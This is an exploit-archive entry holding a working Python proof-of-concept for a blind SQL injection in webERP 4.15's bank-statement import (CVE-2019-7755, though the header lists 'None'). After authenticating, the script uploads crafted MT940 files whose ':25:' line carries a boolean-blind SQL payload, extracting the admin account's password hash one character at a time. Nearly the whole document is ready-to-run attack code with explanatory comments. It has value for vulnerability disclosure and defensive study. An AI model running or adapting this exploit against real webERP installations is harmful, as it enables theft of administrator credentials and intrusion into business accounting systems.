webERP 4.15 - 'ImportBankTransaction' Blind SQL Injection

2019-02-20
ID: 101060
CVE: None
Download vulnerable application: None
#!/usr/bin/env python3

"""
#
#
# Exploit Title:  webERP v4.15 ImportBankTransaction Blind SQL Injection
# Google Dork: N/A
# Date: 2019-02-20
# Exploit Author: Amine Mehdaoui
# Vendor Homepage: https://www.weberp.com
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: 4.15
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-7755
#
#
#
# Description:
# The Import Bank Transaction function fails to sanitize the content of imported MT940 
# bank statement files, resulting in the execution of arbitrary SQL queries.
#
#
#
# Attack Vector:
# An authenticated user with access to the Import Bank Transaction function 
# (to which access is granted by default to security roles such as 'accountant' and 'AR clerk')
# can leverage a specially crafted MT940 file to trigger a SQL injection flaw.
#
#
#
# Notes:
# 1. PoC was written to retrieve admin account CRYPT-BLOWFISH password hash. 
# 2. Successful exploitation requires access to the Import Bank Transaction function.
#
#
#
#
#
"""
from requests import session
from bs4 import BeautifulSoup
import sys, argparse



# Base URL of the target webERP installation; assigned from argv in the
# __main__ block (normalised to end with exactly one '/').
url = ''
# Value of the hidden 'FormID' input read from the login page by login() and
# echoed back in every later POST (appears to be webERP's CSRF/form token).
csrftk = ''



def login(user, password):
    """Authenticate against the webERP instance at the module-level ``url``.

    Fetches the login page to read the hidden ``FormID`` input (stored in the
    module global ``csrftk`` so later requests can echo it), then POSTs the
    credentials. Success is judged solely by the text ``Main Menu`` appearing
    in the <title> of the response.

    Args:
        user: webERP account username.
        password: the account's password.

    Returns:
        The ``requests`` session holding the authenticated cookies, or
        ``None`` when the post-login page title does not contain ``Main Menu``.
    """
    global csrftk

    http = session()
    landing = BeautifulSoup(http.get(url).text, 'html.parser')
    # The token is taken from the login page on every call and reused as-is.
    csrftk = landing.find('input', attrs={'name': 'FormID'})['value']
    form = {
        'UserNameEntryField': user,
        'CompanyNameField': 0,
        'SubmitUser': 'Login',
        'Password': password,
        'FormID': csrftk,
    }
    after_login = BeautifulSoup(http.post(url, form).text, 'html.parser')
    authenticated = 'Main Menu' in after_login.title.string
    return http if authenticated else None




def exploit(session):
    """Recover the stored ``admin`` password hash one character at a time.

    Uses the authenticated *session* to POST a crafted MT940 statement to
    ImportBankTrans.php once per candidate byte; the boolean oracle is
    whether the response body contains the text ``WARNING``.

    Args:
        session: authenticated ``requests`` session as returned by ``login``.

    Returns:
        None. The recovered string is printed to stdout.
    """
    
    admin_hash = ''
    # Character positions 1..60 of the hash (range(61)[1:] == 1..60).
    for i in range(61)[1:]:
        # Candidate bytes: printable ASCII 32..126, skipping 39 (single quote).
        for c in [x for x in range(32, 127) if x!=39]:
            # Boolean-blind probe: the CASE expression yields '1' only when the
            # guessed byte matches position i of the admin password column.
            payload = "123' AND (SELECT CASE WHEN %d=ASCII(substring((SELECT password FROM www_users WHERE userid='admin'), %d, 1)) THEN '1' ELSE '2' END)='1"%(c,i)
            # Minimal MT940 statement with the payload on the ':25:' line,
            # uploaded under the form field name 'ImportFile'.
            mt940_stmt_file = {'ImportFile' : ('mt940.txt', ':20:1\n:25:%s\n:28C:160/2019/PWN\n:60F:1111111USD111111111111,11' %payload)}
            data = {
        
                    'ImportFormat'  :   'MT940-ING',
                    'Import'        :   'Process',
                    'FormID'        :    csrftk
            }
            # One import request per candidate: up to 94 POSTs per position,
            # i.e. several thousand ImportBankTrans.php uploads for a full run —
            # a high-volume, easily logged pattern from a single account.
            resp = session.post('%sImportBankTrans.php' %url, data = data, files = mt940_stmt_file)
            # Oracle: a response without 'WARNING' is treated as a hit.
            if not 'WARNING' in resp.text:
                break
        # `c` is whatever the inner loop left it at: the matching byte on a hit,
        # or the last candidate tested (126) when no candidate broke the loop.
        admin_hash+=chr(c)
    print('[+] admin hash : %s' %admin_hash)




if __name__ == "__main__":
    # Command-line entry point: three positional arguments, in this order.
    cli = argparse.ArgumentParser(
        description='webERP v4.15 ImportBankTransaction Blind SQL Injection Exploit')
    cli.add_argument('url', help='URL of webERP installation directory')
    cli.add_argument('user', help='Account username')
    cli.add_argument('password', help='Account password')
    opts = cli.parse_args()
    # Module global read by login() and exploit(); normalised to one trailing '/'.
    url = opts.url.rstrip('/') + '/'
    # Named `authed` rather than `session` so the imported factory is not shadowed.
    authed = login(opts.user, opts.password)
    if not authed:
        print('[-] Failed to login to webERP')
        sys.exit(1)
    exploit(authed)